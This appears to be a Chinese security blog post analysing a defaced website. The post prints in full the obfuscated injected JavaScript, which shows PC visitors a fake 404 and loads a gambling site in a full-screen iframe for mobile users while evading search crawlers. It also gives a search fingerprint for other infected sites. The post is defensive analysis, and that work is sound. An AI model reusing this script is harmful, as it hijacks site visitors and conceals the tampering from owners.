记一次常规安全监测发现的挂马暗链

前言

因最近工作需求，需要对一些备案网站进行监测，寻找其存在的漏洞，例如主页篡改，挂暗链，弱口令等。在此期间发现一个有趣的案例，前来分享。

发现

这个发现其实也是蛮巧合的，大家先看一下这个首页

很神奇，一打开就提示404 not found，但是标题又提示官网-官方网，明显这个有猫腻

正常来说，404的话标题多数也会是404，查看源代码发现恶意js

进一步分析

var EhaqDJ1 =
	/(Baiduspider|360Spider|YisouSpider|YandexBot|Sogou inst spider|Sogou web spider|spider)/i;
if (!EhaqDJ1[\"\\x74\\x65\\x73\\x74\"](navigator[  //test
	\"\\x75\\x73\\x65\\x72\\x41\\x67\\x65\\x6e\\x74\"])) { //userAgent
	let flag = navigator[\"\\x75\\x73\\x65\\x72\\x41\\x67\\x65\\x6e\\x74\"][ //userAgent
		\"\\x6d\\x61\\x74\\x63\\x68\"  //match
	](
		/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i
	);
	if (flag) {
		_0 =
			\'\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x65\\x72\\x2d\\x73\\x63\\x61\\x6c\\x61\\x62\\x6c\\x65\\x30\\x37\\x2e\\x74\\x6f\\x70\'  //https://user-scalable07.top
	} else {
		_0 = \'\\x2f\\x34\\x30\\x34\\x2e\\x68\\x74\\x6d\\x6c\'  ///404.html
	}
	window[\"\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74\"][\"\\x77\\x72\\x69\\x74\\x65\"](  //document  write
		\'\\x3c\\x6d\\x65\\x74\\x61 \\x68\\x74\\x74\\x70\\x2d\\x65\\x71\\x75\\x69\\x76\\x3d\\x58\\x2d\\x55\\x41\\x2d\\x43\\x6f\\x6d\\x70\\x61\\x74\\x69\\x62\\x6c\\x65 \\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x3d\\x22\\x49\\x45\\x3d\\x65\\x64\\x67\\x65\\x22\\x3e\\x3c\\x6d\\x65\\x74\\x61 \\x6e\\x61\\x6d\\x65\\x3d\\x76\\x69\\x65\\x77\\x70\\x6f\\x72\\x74 \\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x3d\\x22\\x77\\x69\\x64\\x74\\x68\\x3d\\x64\\x65\\x76\\x69\\x63\\x65\\x2d\\x77\\x69\\x64\\x74\\x68\\x2c\\x69\\x6e\\x69\\x74\\x69\\x61\\x6c\\x2d\\x73\\x63\\x61\\x6c\\x65\\x3d\\x31\\x22\\x3e\'  //<metahttp-equiv=X-UA-Compatiblecontent=\"IE=edge\"><metaname=viewportcontent=\"width=device-width,initial-scale=1\">
	);
	var kJZGUYvdz2 = window[\"\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74\"][  //document
		\"\\x68\\x65\\x61\\x64\"  //head
	]; 
	var auz3 = window[\"\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74\"][  //document
			\"\\x63\\x72\\x65\\x61\\x74\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\"
		](\'\\x73\\x74\\x79\\x6c\\x65\'), //style
		ETJ4 = window[\"\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74\"][  //document
			\"\\x63\\x72\\x65\\x61\\x74\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\"  //createElement
		](\'\\x64\\x69\\x76\');  //div
	auz3[\"\\x69\\x6e\\x6e\\x65\\x72\\x48\\x54\\x4d\\x4c\"] =  //innerHTML
		\'\\x68\\x74\\x6d\\x6c\\x2c\\x62\\x6f\\x64\\x79\\x7b\\x70\\x6f\\x73\\x69\\x74\\x69\\x6f\\x6e\\x3a\\x72\\x65\\x6c\\x61\\x74\\x69\\x76\\x65\\x3b\\x77\\x69\\x64\\x74\\x68\\x3a\\x61\\x75\\x74\\x6f \\x21\\x69\\x6d\\x70\\x6f\\x72\\x74\\x61\\x6e\\x74\\x3b\\x68\\x65\\x69\\x67\\x68\\x74\\x3a\\x31\\x30\\x30\\x25 \\x21\\x69\\x6d\\x70\\x6f\\x72\\x74\\x61\\x6e\\x74\\x3b\\x6d\\x69\\x6e\\x2d\\x77\\x69\\x64\\x74\\x68\\x3a\\x61\\x75\\x74\\x6f \\x21\\x69\\x6d\\x70\\x6f\\x72\\x74\\x61\\x6e\\x74\\x3b\\x6f\\x76\\x65\\x72\\x66\\x6c\\x6f\\x77\\x3a\\x68\\x69\\x64\\x64\\x65\\x6e\\x3b\\x7d\\x2e\\x79\\x61\\x62\\x6f\\x7b\\x70\\x6f\\x73\\x69\\x74\\x69\\x6f\\x6e\\x3a\\x66\\x69\\x78\\x65\\x64\\x3b\\x74\\x6f\\x70\\x3a\\x30\\x3b\\x6c\\x65\\x66\\x74\\x3a\\x30\\x3b\\x72\\x69\\x67\\x68\\x74\\x3a\\x30\\x3b\\x68\\x65\\x69\\x67\\x68\\x74\\x3a\\x31\\x30\\x30\\x25\\x3b\\x7a\\x2d\\x69\\x6e\\x64\\x65\\x78\\x3a\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x39\\x3b\\x62\\x61\\x63\\x6b\\x67\\x72\\x6f\\x75\\x6e\\x64\\x3a\\x23\\x66\\x66\\x66\\x3b\\x7d\';
        //html,body{position:relative;width:auto!important;height:100%!important;min-width:auto!important;overflow:hidden;}.yabo{position:fixed;top:0;left:0;right:0;height:100%;z-index:9999999999;background:#fff;}
	ETJ4[\"\\x73\\x65\\x74\\x41\\x74\\x74\\x72\\x69\\x62\\x75\\x74\\x65\"](  //setAttribute
		\'\\x63\\x6c\\x61\\x73\\x73\', \'\\x79\\x61\\x62\\x6f\');  //class  yabo
	ETJ4[\"\\x69\\x6e\\x6e\\x65\\x72\\x48\\x54\\x4d\\x4c\"] = //innerHTML
		\'\\x3c\\x69\\x66\\x72\\x61\\x6d\\x65 \\x73\\x72\\x63\\x3d\' + _0 +  // <iframesrc=
		\' \\x66\\x72\\x61\\x6d\\x65\\x62\\x6f\\x72\\x64\\x65\\x72\\x3d\\x22\\x30\\x22 \\x73\\x74\\x79\\x6c\\x65\\x3d\\x22\\x70\\x6f\\x73\\x69\\x74\\x69\\x6f\\x6e\\x3a\\x66\\x69\\x78\\x65\\x64\\x3b\\x74\\x6f\\x70\\x3a\\x30\\x3b\\x6c\\x65\\x66\\x74\\x3a\\x30\\x3b\\x77\\x69\\x64\\x74\\x68\\x3a\\x31\\x30\\x30\\x25 \\x21\\x69\\x6d\\x70\\x6f\\x72\\x74\\x61\\x6e\\x74\\x3b\\x68\\x65\\x69\\x67\\x68\\x74\\x3a\\x31\\x30\\x30\\x25 \\x21\\x69\\x6d\\x70\\x6f\\x72\\x74\\x61\\x6e\\x74\\x3b\\x6d\\x61\\x78\\x2d\\x68\\x65\\x69\\x67\\x68\\x74\\x3a \\x6e\\x6f\\x6e\\x65 \\x21\\x69\\x6d\\x70\\x6f\\x72\\x74\\x61\\x6e\\x74\\x3b\\x22\\x3e\\x3c\\x2f\\x69\\x66\\x72\\x61\\x6d\\x65\\x3e\';  
        //frameborder=\"0\"style=\"position:fixed;top:0;left:0;width:100%!important;height:100%!important;max-height:none!important;\"></iframe>
	kJZGUYvdz2[\"\\x61\\x70\\x70\\x65\\x6e\\x64\\x43\\x68\\x69\\x6c\\x64\"](auz3);  //appendChild
	kJZGUYvdz2[\"\\x70\\x61\\x72\\x65\\x6e\\x74\\x4e\\x6f\\x64\\x65\"][   //parentNode
		\"\\x61\\x70\\x70\\x65\\x6e\\x64\\x43\\x68\\x69\\x6c\\x64\"  //appendChild
	](ETJ4)
}

不难看出就是判断了一个UA头，如果是pc访问，就提示404，如果是手机访问就跳转正常博彩网页，方便用户下载APP，代码中主要是对网页标签进行修改，按找xss注入来说，类似于dom型注入（主要看innerHTML）

扩大搜索

基本上到这里就可以判断是首页篡改，然后恶意js跳转

接着搜索了一波，发现这个现象好像不止一个，

这上面的站点都和上面一样，pc访问提示404，最主要的是看时间还是最新的，意思就是这个还在持续

fofa搜索指纹 : js_name=\"/gz/gz.js\"

只能说真的是有点厉害

结尾

遇到首页被篡改，多数情况需要查看一下网站是否存在弱口令、任意文件上传、命令执行等漏洞，从这个案例可以看出来，这个基本上是全网批量扫描，然后上线实现的。

对此，咱们只能修改弱口令，及时更新漏洞补丁，注意网站安全。